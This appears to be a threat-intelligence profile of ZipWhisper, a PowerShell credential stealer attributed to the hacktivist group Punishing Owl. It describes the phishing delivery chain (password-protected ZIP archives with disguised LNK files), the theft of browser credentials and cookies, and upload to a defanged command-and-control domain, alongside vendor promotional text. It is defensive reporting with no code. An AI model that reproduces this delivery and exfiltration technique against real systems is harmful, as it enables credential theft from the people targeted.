ZipWhisper
ZipWhisper is a PowerShell-based stealer used by the hacktivist threat actor Punishing Owl in campaigns targeting Russian organizations, including state institutions, scientific enterprises, IT organizations, government security agencies, and broader critical infrastructure targets. Observed since at least December 2025, it has been delivered via phishing and BEC-style emails containing password-protected ZIP archives with disguised Windows shortcut (LNK) files masquerading as PDF documents. When opened, the LNK executes PowerShell commands that download ZipWhisper from attacker-controlled infrastructure, including a command-and-control server at bloggoversikten[.]com. ZipWhisper harvests sensitive data from infected Windows systems, specifically browser credential files, cookies, and saved passwords. It stages the stolen data in the AppData/Local/Temp directory, packages it into ZIP archives using filenames that include the username and chunk numbers, and uploads the archives back to the attacker-controlled server via a customized endpoint structure. Supporting reporting also states that the malware was used to harvest sensitive data and upload it to the same remote server, and that data stolen in related operations was later leaked by Punishing Owl on the dark web. Analysis of the script identified code comments suggesting possible use of AI tooling to generate parts of the malware.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
...download a stealer named ZipWhisper from a remote server to harvest sensitive data and upload it to the same server.
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
2 techniques
Execution
Stealth
1 technique
Stealth
Collection
1 technique
Collection
Command and Control
1 technique
Command and Control
Recent activity
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Information-stealing malware delivered via phishing (password-protected ZIP containing LNK) that uses PowerShell to download the stealer, harvest sensitive data, and exfiltrate it to the same remote server.
PowerShell-based credential stealer delivered via password-protected ZIP attachments containing disguised LNK files. Executes PowerShell to download the payload, then collects browser credential stores (credentials, cookies, saved passwords), packages the data into ZIP archives (with username/chunk naming), stages them in AppData/Local/Temp, and uploads them to a C2 endpoint on attacker infrastructure.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.